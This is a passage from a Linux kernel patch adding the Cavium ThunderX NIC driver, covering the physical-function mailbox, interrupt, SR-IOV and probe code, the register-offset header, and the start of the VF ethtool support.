reg_addr, mbx.sq.cfg); + nic_tx_channel_cfg(nic, mbx.qs.num, mbx.sq.sq_num); + break; + case NIC_MBOX_MSG_SET_MAC: + lmac = mbx.mac.vf_id; + bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[lmac]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[lmac]); +#ifdef __BIG_ENDIAN + mac_addr = cpu_to_be64(mbx.nic_cfg.mac_addr) << 16; +#else + mac_addr = cpu_to_be64(mbx.nic_cfg.mac_addr) >> 16; +#endif + bgx_set_lmac_mac(nic->node, bgx, lmac, (u8 *)&mac_addr); + break; + case NIC_MBOX_MSG_SET_MAX_FRS: + ret = nic_update_hw_frs(nic, mbx.frs.max_frs, + mbx.frs.vf_id); + break; + case NIC_MBOX_MSG_CPI_CFG: + nic_config_cpi(nic, &mbx.cpi_cfg); + break; + case NIC_MBOX_MSG_RSS_SIZE: + nic_send_rss_size(nic, vf); + goto unlock; + case NIC_MBOX_MSG_RSS_CFG: + case NIC_MBOX_MSG_RSS_CFG_CONT: + nic_config_rss(nic, &mbx.rss_cfg); + break; + case NIC_MBOX_MSG_CFG_DONE: + /* Last message of VF config msg sequence */ + nic->vf_enabled[vf] = true; + goto unlock; + case NIC_MBOX_MSG_SHUTDOWN: + /* First msg in VF teardown sequence */ + nic->vf_enabled[vf] = false; + break; + case NIC_MBOX_MSG_BGX_STATS: + nic_get_bgx_stats(nic, &mbx.bgx_stats); + goto unlock; + default: + dev_err(&nic->pdev->dev, + "Invalid msg from VF%d, msg 0x%x\n", vf, mbx.msg.msg); + break; + } + + if (!ret) + nic_mbx_send_ack(nic, vf); + else if (mbx.msg.msg != NIC_MBOX_MSG_READY) + nic_mbx_send_nack(nic, vf); +unlock: + nic->mbx_lock[vf] = false; +} + +static void nic_mbx_intr_handler (struct nicpf *nic, int mbx) +{ + u64 intr; + u8 vf, vf_per_mbx_reg = 64; + + intr = nic_reg_read(nic, NIC_PF_MAILBOX_INT + (mbx << 3)); + dev_dbg(&nic->pdev->dev, "PF interrupt Mbox%d 0x%llx\n", mbx, intr); + for (vf = 0; vf < vf_per_mbx_reg; vf++) { + if (intr & (1ULL << vf)) { + dev_dbg(&nic->pdev->dev, "Intr from VF %d\n", + vf + (mbx * vf_per_mbx_reg)); + if ((vf + (mbx * vf_per_mbx_reg)) > nic->num_vf_en) + break; + nic_handle_mbx_intr(nic, vf + (mbx * vf_per_mbx_reg)); + nic_clear_mbx_intr(nic, vf, mbx); + } + } +} + +static irqreturn_t nic_mbx0_intr_handler (int irq, void *nic_irq) +{ + struct nicpf *nic = (struct nicpf *)nic_irq; + + nic_mbx_intr_handler(nic, 0); + + return IRQ_HANDLED; +} + +static irqreturn_t nic_mbx1_intr_handler (int irq, void *nic_irq) +{ + struct nicpf *nic = (struct nicpf *)nic_irq; + + nic_mbx_intr_handler(nic, 1); + + return IRQ_HANDLED; +} + +static int nic_enable_msix(struct nicpf *nic) +{ + int i, ret; + + nic->num_vec = NIC_PF_MSIX_VECTORS; + + for (i = 0; i < nic->num_vec; i++) + nic->msix_entries[i].entry = i; + + ret = pci_enable_msix(nic->pdev, nic->msix_entries, nic->num_vec); + if (ret) { + dev_err(&nic->pdev->dev, + "Request for #%d msix vectors failed\n", + nic->num_vec); + return ret; + } + + nic->msix_enabled = 1; + return 0; +} + +static void nic_disable_msix(struct nicpf *nic) +{ + if (nic->msix_enabled) { + pci_disable_msix(nic->pdev); + nic->msix_enabled = 0; + nic->num_vec = 0; + } +} + +static void nic_free_all_interrupts(struct nicpf *nic) +{ + int irq; + + for (irq = 0; irq < nic->num_vec; irq++) { + if (nic->irq_allocated[irq]) + free_irq(nic->msix_entries[irq].vector, nic); + nic->irq_allocated[irq] = false; + } +} + +static int nic_register_interrupts(struct nicpf *nic) +{ + int ret; + + /* Enable MSI-X */ + ret = nic_enable_msix(nic); + if (ret) + return ret; + + /* Register mailbox interrupt handlers */ + ret = request_irq(nic->msix_entries[NIC_PF_INTR_ID_MBOX0].vector, + nic_mbx0_intr_handler, 0, "NIC Mbox0", nic); + if (ret) + goto fail; + + nic->irq_allocated[NIC_PF_INTR_ID_MBOX0] = 
true; + + ret = request_irq(nic->msix_entries[NIC_PF_INTR_ID_MBOX1].vector, + nic_mbx1_intr_handler, 0, "NIC Mbox1", nic); + if (ret) + goto fail; + + nic->irq_allocated[NIC_PF_INTR_ID_MBOX1] = true; + + /* Enable mailbox interrupt */ + nic_enable_mbx_intr(nic); + return 0; + +fail: + dev_err(&nic->pdev->dev, "Request irq failed\n"); + nic_free_all_interrupts(nic); + return ret; +} + +static void nic_unregister_interrupts(struct nicpf *nic) +{ + nic_free_all_interrupts(nic); + nic_disable_msix(nic); +} + +static int nic_sriov_init(struct pci_dev *pdev, struct nicpf *nic) +{ + int pos = 0; + int err; + u16 total_vf_cnt; + + pos = pci_find_ext_capability(pdev, PCI_EXT_CAP_ID_SRIOV); + if (!pos) { + dev_err(&pdev->dev, "SRIOV capability is not found in PCIe config space\n"); + return -ENODEV; + } + + pci_read_config_word(pdev, (pos + PCI_SRIOV_TOTAL_VF), &total_vf_cnt); + if (total_vf_cnt < nic->num_vf_en) + nic->num_vf_en = total_vf_cnt; + + if (!total_vf_cnt) + return 0; + + err = pci_enable_sriov(pdev, nic->num_vf_en); + if (err) { + dev_err(&pdev->dev, "SRIOV enable failed, num VF is %d\n", + nic->num_vf_en); + nic->num_vf_en = 0; + return err; + } + + dev_info(&pdev->dev, "SRIOV enabled, number of VF available %d\n", + nic->num_vf_en); + + nic->flags |= NIC_SRIOV_ENABLED; + return 0; +} + +/* Poll for BGX LMAC link status and update corresponding VF + * if there is a change, valid only if internal L2 switch + * is not present otherwise VF link is always treated as up + */ +static void nic_poll_for_link(struct work_struct *work) +{ + union nic_mbx mbx = {}; + struct nicpf *nic; + struct bgx_link_status link; + u8 vf, bgx, lmac; + + nic = container_of(work, struct nicpf, dwork.work); + + mbx.link_status.msg = NIC_MBOX_MSG_BGX_LINK_CHANGE; + + for (vf = 0; vf < nic->num_vf_en; vf++) { + /* Poll only if VF is UP */ + if (!nic->vf_enabled[vf]) + continue; + + /* Get BGX, LMAC indices for the VF */ + bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vf]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vf]); + /* Get interface link status */ + bgx_get_lmac_link_state(nic->node, bgx, lmac, &link); + + /* Inform VF only if link status changed */ + if (nic->link[vf] == link.link_up) + continue; + + if (!nic->mbx_lock[vf]) { + nic->link[vf] = link.link_up; + nic->duplex[vf] = link.duplex; + nic->speed[vf] = link.speed; + + /* Send a mbox message to VF with current link status */ + mbx.link_status.link_up = link.link_up; + mbx.link_status.duplex = link.duplex; + mbx.link_status.speed = link.speed; + nic_send_msg_to_vf(nic, vf, &mbx); + } + } + queue_delayed_work(nic->check_link, &nic->dwork, HZ * 2); +} + +static int nic_probe(struct pci_dev *pdev, const struct pci_device_id *ent) +{ + struct device *dev = &pdev->dev; + struct nicpf *nic; + int err; + + BUILD_BUG_ON(sizeof(union nic_mbx) > 16); + + nic = devm_kzalloc(dev, sizeof(*nic), GFP_KERNEL); + if (!nic) + return -ENOMEM; + + pci_set_drvdata(pdev, nic); + + nic->pdev = pdev; + + err = pci_enable_device(pdev); + if (err) { + dev_err(dev, "Failed to enable PCI device\n"); + pci_set_drvdata(pdev, NULL); + return err; + } + + err = pci_request_regions(pdev, DRV_NAME); + if (err) { + dev_err(dev, "PCI request regions failed 0x%x\n", err); + goto err_disable_device; + } + + err = pci_set_dma_mask(pdev, DMA_BIT_MASK(48)); + if (err) { + dev_err(dev, "Unable to get usable DMA configuration\n"); + goto err_release_regions; + } + + err = pci_set_consistent_dma_mask(pdev, DMA_BIT_MASK(48)); + if (err) { + dev_err(dev, "Unable to get 48-bit DMA 
for consistent allocations\n"); + goto err_release_regions; + } + + /* MAP PF's configuration registers */ + nic->reg_base = pcim_iomap(pdev, PCI_CFG_REG_BAR_NUM, 0); + if (!nic->reg_base) { + dev_err(dev, "Cannot map config register space, aborting\n"); + err = -ENOMEM; + goto err_release_regions; + } + + pci_read_config_byte(pdev, PCI_REVISION_ID, &nic->rev_id); + + nic->node = NIC_NODE_ID(pci_resource_start(pdev, PCI_CFG_REG_BAR_NUM)); + + nic_set_lmac_vf_mapping(nic); + + /* Initialize hardware */ + nic_init_hw(nic); + + /* Set RSS TBL size for each VF */ + nic->rss_ind_tbl_size = NIC_MAX_RSS_IDR_TBL_SIZE; + + /* Register interrupts */ + err = nic_register_interrupts(nic); + if (err) + goto err_release_regions; + + /* Configure SRIOV */ + err = nic_sriov_init(pdev, nic); + if (err) + goto err_unregister_interrupts; + + /* Register a physical link status poll fn() */ + nic->check_link = alloc_workqueue("check_link_status", + WQ_UNBOUND | WQ_MEM_RECLAIM, 1); + if (!nic->check_link) { + err = -ENOMEM; + goto err_disable_sriov; + } + + INIT_DELAYED_WORK(&nic->dwork, nic_poll_for_link); + queue_delayed_work(nic->check_link, &nic->dwork, 0); + + return 0; + +err_disable_sriov: + if (nic->flags & NIC_SRIOV_ENABLED) + pci_disable_sriov(pdev); +err_unregister_interrupts: + nic_unregister_interrupts(nic); +err_release_regions: + pci_release_regions(pdev); +err_disable_device: + pci_disable_device(pdev); + pci_set_drvdata(pdev, NULL); + return err; +} + +static void nic_remove(struct pci_dev *pdev) +{ + struct nicpf *nic = pci_get_drvdata(pdev); + + if (nic->flags & NIC_SRIOV_ENABLED) + pci_disable_sriov(pdev); + + if (nic->check_link) { + /* Destroy work Queue */ + cancel_delayed_work(&nic->dwork); + flush_workqueue(nic->check_link); + destroy_workqueue(nic->check_link); + } + + nic_unregister_interrupts(nic); + pci_release_regions(pdev); + pci_disable_device(pdev); + pci_set_drvdata(pdev, NULL); +} + +static struct pci_driver nic_driver = { + .name = DRV_NAME, + .id_table = nic_id_table, + .probe = nic_probe, + .remove = nic_remove, +}; + +static int __init nic_init_module(void) +{ + pr_info("%s, ver %s\n", DRV_NAME, DRV_VERSION); + + return pci_register_driver(&nic_driver); +} + +static void __exit nic_cleanup_module(void) +{ + pci_unregister_driver(&nic_driver); +} + +module_init(nic_init_module); +module_exit(nic_cleanup_module); diff --git a/drivers/net/ethernet/cavium/thunder/nic_reg.h b/drivers/net/ethernet/cavium/thunder/nic_reg.h new file mode 100644 index 000000000000..58197bb2f805 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nic_reg.h @@ -0,0 +1,213 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. 
+ */ + +#ifndef NIC_REG_H +#define NIC_REG_H + +#define NIC_PF_REG_COUNT 29573 +#define NIC_VF_REG_COUNT 249 + +/* Physical function register offsets */ +#define NIC_PF_CFG (0x0000) +#define NIC_PF_STATUS (0x0010) +#define NIC_PF_INTR_TIMER_CFG (0x0030) +#define NIC_PF_BIST_STATUS (0x0040) +#define NIC_PF_SOFT_RESET (0x0050) +#define NIC_PF_TCP_TIMER (0x0060) +#define NIC_PF_BP_CFG (0x0080) +#define NIC_PF_RRM_CFG (0x0088) +#define NIC_PF_CQM_CF (0x00A0) +#define NIC_PF_CNM_CF (0x00A8) +#define NIC_PF_CNM_STATUS (0x00B0) +#define NIC_PF_CQ_AVG_CFG (0x00C0) +#define NIC_PF_RRM_AVG_CFG (0x00C8) +#define NIC_PF_INTF_0_1_SEND_CFG (0x0200) +#define NIC_PF_INTF_0_1_BP_CFG (0x0208) +#define NIC_PF_INTF_0_1_BP_DIS_0_1 (0x0210) +#define NIC_PF_INTF_0_1_BP_SW_0_1 (0x0220) +#define NIC_PF_RBDR_BP_STATE_0_3 (0x0240) +#define NIC_PF_MAILBOX_INT (0x0410) +#define NIC_PF_MAILBOX_INT_W1S (0x0430) +#define NIC_PF_MAILBOX_ENA_W1C (0x0450) +#define NIC_PF_MAILBOX_ENA_W1S (0x0470) +#define NIC_PF_RX_ETYPE_0_7 (0x0500) +#define NIC_PF_PKIND_0_15_CFG (0x0600) +#define NIC_PF_ECC0_FLIP0 (0x1000) +#define NIC_PF_ECC1_FLIP0 (0x1008) +#define NIC_PF_ECC2_FLIP0 (0x1010) +#define NIC_PF_ECC3_FLIP0 (0x1018) +#define NIC_PF_ECC0_FLIP1 (0x1080) +#define NIC_PF_ECC1_FLIP1 (0x1088) +#define NIC_PF_ECC2_FLIP1 (0x1090) +#define NIC_PF_ECC3_FLIP1 (0x1098) +#define NIC_PF_ECC0_CDIS (0x1100) +#define NIC_PF_ECC1_CDIS (0x1108) +#define NIC_PF_ECC2_CDIS (0x1110) +#define NIC_PF_ECC3_CDIS (0x1118) +#define NIC_PF_BIST0_STATUS (0x1280) +#define NIC_PF_BIST1_STATUS (0x1288) +#define NIC_PF_BIST2_STATUS (0x1290) +#define NIC_PF_BIST3_STATUS (0x1298) +#define NIC_PF_ECC0_SBE_INT (0x2000) +#define NIC_PF_ECC0_SBE_INT_W1S (0x2008) +#define NIC_PF_ECC0_SBE_ENA_W1C (0x2010) +#define NIC_PF_ECC0_SBE_ENA_W1S (0x2018) +#define NIC_PF_ECC0_DBE_INT (0x2100) +#define NIC_PF_ECC0_DBE_INT_W1S (0x2108) +#define NIC_PF_ECC0_DBE_ENA_W1C (0x2110) +#define NIC_PF_ECC0_DBE_ENA_W1S (0x2118) +#define NIC_PF_ECC1_SBE_INT (0x2200) +#define NIC_PF_ECC1_SBE_INT_W1S (0x2208) +#define NIC_PF_ECC1_SBE_ENA_W1C (0x2210) +#define NIC_PF_ECC1_SBE_ENA_W1S (0x2218) +#define NIC_PF_ECC1_DBE_INT (0x2300) +#define NIC_PF_ECC1_DBE_INT_W1S (0x2308) +#define NIC_PF_ECC1_DBE_ENA_W1C (0x2310) +#define NIC_PF_ECC1_DBE_ENA_W1S (0x2318) +#define NIC_PF_ECC2_SBE_INT (0x2400) +#define NIC_PF_ECC2_SBE_INT_W1S (0x2408) +#define NIC_PF_ECC2_SBE_ENA_W1C (0x2410) +#define NIC_PF_ECC2_SBE_ENA_W1S (0x2418) +#define NIC_PF_ECC2_DBE_INT (0x2500) +#define NIC_PF_ECC2_DBE_INT_W1S (0x2508) +#define NIC_PF_ECC2_DBE_ENA_W1C (0x2510) +#define NIC_PF_ECC2_DBE_ENA_W1S (0x2518) +#define NIC_PF_ECC3_SBE_INT (0x2600) +#define NIC_PF_ECC3_SBE_INT_W1S (0x2608) +#define NIC_PF_ECC3_SBE_ENA_W1C (0x2610) +#define NIC_PF_ECC3_SBE_ENA_W1S (0x2618) +#define NIC_PF_ECC3_DBE_INT (0x2700) +#define NIC_PF_ECC3_DBE_INT_W1S (0x2708) +#define NIC_PF_ECC3_DBE_ENA_W1C (0x2710) +#define NIC_PF_ECC3_DBE_ENA_W1S (0x2718) +#define NIC_PF_CPI_0_2047_CFG (0x200000) +#define NIC_PF_RSSI_0_4097_RQ (0x220000) +#define NIC_PF_LMAC_0_7_CFG (0x240000) +#define NIC_PF_LMAC_0_7_SW_XOFF (0x242000) +#define NIC_PF_LMAC_0_7_CREDIT (0x244000) +#define NIC_PF_CHAN_0_255_TX_CFG (0x400000) +#define NIC_PF_CHAN_0_255_RX_CFG (0x420000) +#define NIC_PF_CHAN_0_255_SW_XOFF (0x440000) +#define NIC_PF_CHAN_0_255_CREDIT (0x460000) +#define NIC_PF_CHAN_0_255_RX_BP_CFG (0x480000) +#define NIC_PF_SW_SYNC_RX (0x490000) +#define NIC_PF_SW_SYNC_RX_DONE (0x490008) +#define NIC_PF_TL2_0_63_CFG (0x500000) +#define NIC_PF_TL2_0_63_PRI (0x520000) 
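[Editorial note, not part of the patch] The TL2/TL3/TL4 offsets in this block are what nic_tx_channel_cfg() in nic_main.c indexes using the scheduler math described in its sample-configuration comment. A worked sketch of that mapping is below; example_tl_indices is a hypothetical helper, and the NIC_TL4_PER_LMAC, NIC_TL4_PER_BGX, NIC_MAX_TL4 and NIC_MAX_TL3 constants are taken to be the ones nic.h provides earlier in this patch.

        /* Illustrative sketch of the TL index math used by nic_tx_channel_cfg().
         * E.g. VNIC2/SQ0 (bgx 0, lmac 2, sq_idx 0) gives tl4 = 16, tl3 = 4,
         * tl2 = 1, matching the sample table in nic_main.c above.
         */
        static void example_tl_indices(u32 bgx, u32 lmac, u32 sq_idx,
                                       u32 *tl4, u32 *tl3, u32 *tl2)
        {
                *tl4 = (lmac * NIC_TL4_PER_LMAC) + (bgx * NIC_TL4_PER_BGX) + sq_idx;
                *tl3 = *tl4 / (NIC_MAX_TL4 / NIC_MAX_TL3);
                *tl2 = *tl3 >> 2;
        }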
+#define NIC_PF_TL2_0_63_SH_STATUS (0x580000) +#define NIC_PF_TL3A_0_63_CFG (0x5F0000) +#define NIC_PF_TL3_0_255_CFG (0x600000) +#define NIC_PF_TL3_0_255_CHAN (0x620000) +#define NIC_PF_TL3_0_255_PIR (0x640000) +#define NIC_PF_TL3_0_255_SW_XOFF (0x660000) +#define NIC_PF_TL3_0_255_CNM_RATE (0x680000) +#define NIC_PF_TL3_0_255_SH_STATUS (0x6A0000) +#define NIC_PF_TL4A_0_255_CFG (0x6F0000) +#define NIC_PF_TL4_0_1023_CFG (0x800000) +#define NIC_PF_TL4_0_1023_SW_XOFF (0x820000) +#define NIC_PF_TL4_0_1023_SH_STATUS (0x840000) +#define NIC_PF_TL4A_0_1023_CNM_RATE (0x880000) +#define NIC_PF_TL4A_0_1023_CNM_STATUS (0x8A0000) +#define NIC_PF_VF_0_127_MAILBOX_0_1 (0x20002030) +#define NIC_PF_VNIC_0_127_TX_STAT_0_4 (0x20004000) +#define NIC_PF_VNIC_0_127_RX_STAT_0_13 (0x20004100) +#define NIC_PF_QSET_0_127_LOCK_0_15 (0x20006000) +#define NIC_PF_QSET_0_127_CFG (0x20010000) +#define NIC_PF_QSET_0_127_RQ_0_7_CFG (0x20010400) +#define NIC_PF_QSET_0_127_RQ_0_7_DROP_CFG (0x20010420) +#define NIC_PF_QSET_0_127_RQ_0_7_BP_CFG (0x20010500) +#define NIC_PF_QSET_0_127_RQ_0_7_STAT_0_1 (0x20010600) +#define NIC_PF_QSET_0_127_SQ_0_7_CFG (0x20010C00) +#define NIC_PF_QSET_0_127_SQ_0_7_CFG2 (0x20010C08) +#define NIC_PF_QSET_0_127_SQ_0_7_STAT_0_1 (0x20010D00) + +#define NIC_PF_MSIX_VEC_0_18_ADDR (0x000000) +#define NIC_PF_MSIX_VEC_0_CTL (0x000008) +#define NIC_PF_MSIX_PBA_0 (0x0F0000) + +/* Virtual function register offsets */ +#define NIC_VNIC_CFG (0x000020) +#define NIC_VF_PF_MAILBOX_0_1 (0x000130) +#define NIC_VF_INT (0x000200) +#define NIC_VF_INT_W1S (0x000220) +#define NIC_VF_ENA_W1C (0x000240) +#define NIC_VF_ENA_W1S (0x000260) + +#define NIC_VNIC_RSS_CFG (0x0020E0) +#define NIC_VNIC_RSS_KEY_0_4 (0x002200) +#define NIC_VNIC_TX_STAT_0_4 (0x004000) +#define NIC_VNIC_RX_STAT_0_13 (0x004100) +#define NIC_QSET_RQ_GEN_CFG (0x010010) + +#define NIC_QSET_CQ_0_7_CFG (0x010400) +#define NIC_QSET_CQ_0_7_CFG2 (0x010408) +#define NIC_QSET_CQ_0_7_THRESH (0x010410) +#define NIC_QSET_CQ_0_7_BASE (0x010420) +#define NIC_QSET_CQ_0_7_HEAD (0x010428) +#define NIC_QSET_CQ_0_7_TAIL (0x010430) +#define NIC_QSET_CQ_0_7_DOOR (0x010438) +#define NIC_QSET_CQ_0_7_STATUS (0x010440) +#define NIC_QSET_CQ_0_7_STATUS2 (0x010448) +#define NIC_QSET_CQ_0_7_DEBUG (0x010450) + +#define NIC_QSET_RQ_0_7_CFG (0x010600) +#define NIC_QSET_RQ_0_7_STAT_0_1 (0x010700) + +#define NIC_QSET_SQ_0_7_CFG (0x010800) +#define NIC_QSET_SQ_0_7_THRESH (0x010810) +#define NIC_QSET_SQ_0_7_BASE (0x010820) +#define NIC_QSET_SQ_0_7_HEAD (0x010828) +#define NIC_QSET_SQ_0_7_TAIL (0x010830) +#define NIC_QSET_SQ_0_7_DOOR (0x010838) +#define NIC_QSET_SQ_0_7_STATUS (0x010840) +#define NIC_QSET_SQ_0_7_DEBUG (0x010848) +#define NIC_QSET_SQ_0_7_CNM_CHG (0x010860) +#define NIC_QSET_SQ_0_7_STAT_0_1 (0x010900) + +#define NIC_QSET_RBDR_0_1_CFG (0x010C00) +#define NIC_QSET_RBDR_0_1_THRESH (0x010C10) +#define NIC_QSET_RBDR_0_1_BASE (0x010C20) +#define NIC_QSET_RBDR_0_1_HEAD (0x010C28) +#define NIC_QSET_RBDR_0_1_TAIL (0x010C30) +#define NIC_QSET_RBDR_0_1_DOOR (0x010C38) +#define NIC_QSET_RBDR_0_1_STATUS0 (0x010C40) +#define NIC_QSET_RBDR_0_1_STATUS1 (0x010C48) +#define NIC_QSET_RBDR_0_1_PREFETCH_STATUS (0x010C50) + +#define NIC_VF_MSIX_VECTOR_0_19_ADDR (0x000000) +#define NIC_VF_MSIX_VECTOR_0_19_CTL (0x000008) +#define NIC_VF_MSIX_PBA (0x0F0000) + +/* Offsets within registers */ +#define NIC_MSIX_VEC_SHIFT 4 +#define NIC_Q_NUM_SHIFT 18 +#define NIC_QS_ID_SHIFT 21 +#define NIC_VF_NUM_SHIFT 21 + +/* Port kind configuration register */ +struct pkind_cfg { +#if defined(__BIG_ENDIAN_BITFIELD) + 
u64 reserved_42_63:22; + u64 hdr_sl:5; /* Header skip length */ + u64 rx_hdr:3; /* TNS Receive header present */ + u64 lenerr_en:1;/* L2 length error check enable */ + u64 reserved_32_32:1; + u64 maxlen:16; /* Max frame size */ + u64 minlen:16; /* Min frame size */ +#elif defined(__LITTLE_ENDIAN_BITFIELD) + u64 minlen:16; + u64 maxlen:16; + u64 reserved_32_32:1; + u64 lenerr_en:1; + u64 rx_hdr:3; + u64 hdr_sl:5; + u64 reserved_42_63:22; +#endif +}; + +#endif /* NIC_REG_H */ diff --git a/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c b/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c new file mode 100644 index 000000000000..0fc4a536afc9 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nicvf_ethtool.c @@ -0,0 +1,601 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +/* ETHTOOL Support for VNIC_VF Device*/ + +#include + +#include "nic_reg.h" +#include "nic.h" +#include "nicvf_queues.h" +#include "q_struct.h" +#include "thunder_bgx.h" + +#define DRV_NAME "thunder-nicvf" +#define DRV_VERSION "1.0" + +struct nicvf_stat { + char name[ETH_GSTRING_LEN]; + unsigned int index; +}; + +#define NICVF_HW_STAT(stat) { \ + .name = #stat, \ + .index = offsetof(struct nicvf_hw_stats, stat) / sizeof(u64), \ +} + +#define NICVF_DRV_STAT(stat) { \ + .name = #stat, \ + .index = offsetof(struct nicvf_drv_stats, stat) / sizeof(u64), \ +} + +static const struct nicvf_stat nicvf_hw_stats[] = { + NICVF_HW_STAT(rx_bytes_ok), + NICVF_HW_STAT(rx_ucast_frames_ok), + NICVF_HW_STAT(rx_bcast_frames_ok), + NICVF_HW_STAT(rx_mcast_frames_ok), + NICVF_HW_STAT(rx_fcs_errors), + NICVF_HW_STAT(rx_l2_errors), + NICVF_HW_STAT(rx_drop_red), + NICVF_HW_STAT(rx_drop_red_bytes), + NICVF_HW_STAT(rx_drop_overrun), + NICVF_HW_STAT(rx_drop_overrun_bytes), + NICVF_HW_STAT(rx_drop_bcast), + NICVF_HW_STAT(rx_drop_mcast), + NICVF_HW_STAT(rx_drop_l3_bcast), + NICVF_HW_STAT(rx_drop_l3_mcast), + NICVF_HW_STAT(tx_bytes_ok), + NICVF_HW_STAT(tx_ucast_frames_ok), + NICVF_HW_STAT(tx_bcast_frames_ok), + NICVF_HW_STAT(tx_mcast_frames_ok), +}; + +static const struct nicvf_stat nicvf_drv_stats[] = { + NICVF_DRV_STAT(rx_frames_ok), + NICVF_DRV_STAT(rx_frames_64), + NICVF_DRV_STAT(rx_frames_127), + NICVF_DRV_STAT(rx_frames_255), + NICVF_DRV_STAT(rx_frames_511), + NICVF_DRV_STAT(rx_frames_1023), + NICVF_DRV_STAT(rx_frames_1518), + NICVF_DRV_STAT(rx_frames_jumbo), + NICVF_DRV_STAT(rx_drops), + NICVF_DRV_STAT(tx_frames_ok), + NICVF_DRV_STAT(tx_busy), + NICVF_DRV_STAT(tx_tso), + NICVF_DRV_STAT(tx_drops), +}; + +static const struct nicvf_stat nicvf_queue_stats[] = { + { "bytes", 0 }, + { "frames", 1 }, +}; + +static const unsigned int nicvf_n_hw_stats = ARRAY_SIZE(nicvf_hw_stats); +static const unsigned int nicvf_n_drv_stats = ARRAY_SIZE(nicvf_drv_stats); +static const unsigned int nicvf_n_queue_stats = ARRAY_SIZE(nicvf_queue_stats); + +static int nicvf_get_settings(struct net_device *netdev, + struct ethtool_cmd *cmd) +{ + struct nicvf *nic = netdev_priv(netdev); + + cmd->supported = 0; + cmd->transceiver = XCVR_EXTERNAL; + if (nic->speed <= 1000) { + cmd->port = PORT_MII; + cmd->autoneg = AUTONEG_ENABLE; + } else { + cmd->port = PORT_FIBRE; + cmd->autoneg = AUTONEG_DISABLE; + } + cmd->duplex = nic->duplex; + ethtool_cmd_speed_set(cmd, nic->speed); + + return 0; +} + +static void nicvf_get_drvinfo(struct net_device *netdev, + struct ethtool_drvinfo 
*info) +{ + struct nicvf *nic = netdev_priv(netdev); + + strlcpy(info->driver, DRV_NAME, sizeof(info->driver)); + strlcpy(info->version, DRV_VERSION, sizeof(info->version)); + strlcpy(info->bus_info, pci_name(nic->pdev), sizeof(info->bus_info)); +} + +static u32 nicvf_get_msglevel(struct net_device *netdev) +{ + struct nicvf *nic = netdev_priv(netdev); + + return nic->msg_enable; +} + +static void nicvf_set_msglevel(struct net_device *netdev, u32 lvl) +{ + struct nicvf *nic = netdev_priv(netdev); + + nic->msg_enable = lvl; +} + +static void nicvf_get_strings(struct net_device *netdev, u32 sset, u8 *data) +{ + int stats, qidx; + + if (sset != ETH_SS_STATS) + return; + + for (stats = 0; stats < nicvf_n_hw_stats; stats++) { + memcpy(data, nicvf_hw_stats[stats].name, ETH_GSTRING_LEN); + data += ETH_GSTRING_LEN; + } + + for (stats = 0; stats < nicvf_n_drv_stats; stats++) { + memcpy(data, nicvf_drv_stats[stats].name, ETH_GSTRING_LEN); + data += ETH_GSTRING_LEN; + } + + for (qidx = 0; qidx < MAX_RCV_QUEUES_PER_QS; qidx++) { + for (stats = 0; stats < nicvf_n_queue_stats; stats++) { + sprintf(data, "rxq%d: %s", qidx, + nicvf_queue_stats[stats].name); + data += ETH_GSTRING_LEN; + } + } + + for (qidx = 0; qidx < MAX_SND_QUEUES_PER_QS; qidx++) { + for (stats = 0; stats < nicvf_n_queue_stats; stats++) { + sprintf(data, "txq%d: %s", qidx, + nicvf_queue_stats[stats].name); + data += ETH_GSTRING_LEN; + } + } + + for (stats = 0; stats < BGX_RX_STATS_COUNT; stats++) { + sprintf(data, "bgx_rxstat%d: ", stats); + data += ETH_GSTRING_LEN; + } + + for (stats = 0; stats < BGX_TX_STATS_COUNT; stats++) { + sprintf(data, "bgx_txstat%d: ", stats); + data += ETH_GSTRING_LEN; + } +} + +static int nicvf_get_sset_count(struct net_device *netdev, int sset) +{ + if (sset != ETH_SS_STATS) + return -EINVAL; + + return nicvf_n_hw_stats + nicvf_n_drv_stats + + (nicvf_n_queue_stats * + (MAX_RCV_QUEUES_PER_QS + MAX_SND_QUEUES_PER_QS)) + + BGX_RX_STATS_COUNT + BGX_TX_STATS_COUNT; +} + +static void nicvf_get_ethtool_stats(struct net_device *netdev, + struct ethtool_stats *stats, u64 *data) +{ + struct nicvf *nic = netdev_priv(netdev); + int stat, qidx; + + nicvf_update_stats(nic); + + /* Update LMAC stats */ + nicvf_update_lmac_stats(nic); + + for (stat = 0; stat < nicvf_n_hw_stats; stat++) + *(data++) = ((u64 *)&nic->stats) + [nicvf_hw_stats[stat].index]; + for (stat = 0; stat < nicvf_n_drv_stats; stat++) + *(data++) = ((u64 *)&nic->drv_stats) + [nicvf_drv_stats[stat].index]; + + for (qidx = 0; qidx < MAX_RCV_QUEUES_PER_QS; qidx++) { + for (stat = 0; stat < nicvf_n_queue_stats; stat++) + *(data++) = ((u64 *)&nic->qs->rq[qidx].stats) + [nicvf_queue_stats[stat].index]; + } + + for (qidx = 0; qidx < MAX_SND_QUEUES_PER_QS; qidx++) { + for (stat = 0; stat < nicvf_n_queue_stats; stat++) + *(data++) = ((u64 *)&nic->qs->sq[qidx].stats) + [nicvf_queue_stats[stat].index]; + } + + for (stat = 0; stat < BGX_RX_STATS_COUNT; stat++) + *(data++) = nic->bgx_stats.rx_stats[stat]; + for (stat = 0; stat < BGX_TX_STATS_COUNT; stat++) + *(data++) = nic->bgx_stats.tx_stats[stat]; +} + +static int nicvf_get_regs_len(struct net_device *dev) +{ + return sizeof(u64) * NIC_VF_REG_COUNT; +} + +static void nicvf_get_regs(struct net_device *dev, + struct ethtool_regs *regs, void *reg) +{ + struct nicvf *nic = netdev_priv(dev); + u64 *p = (u64 *)reg; + u64 reg_offset; + int mbox, key, stat, q; + int i = 0; + + regs->version = 0; + memset(p, 0, NIC_VF_REG_COUNT); + + p[i++] = nicvf_reg_read(nic, NIC_VNIC_CFG); + /* Mailbox 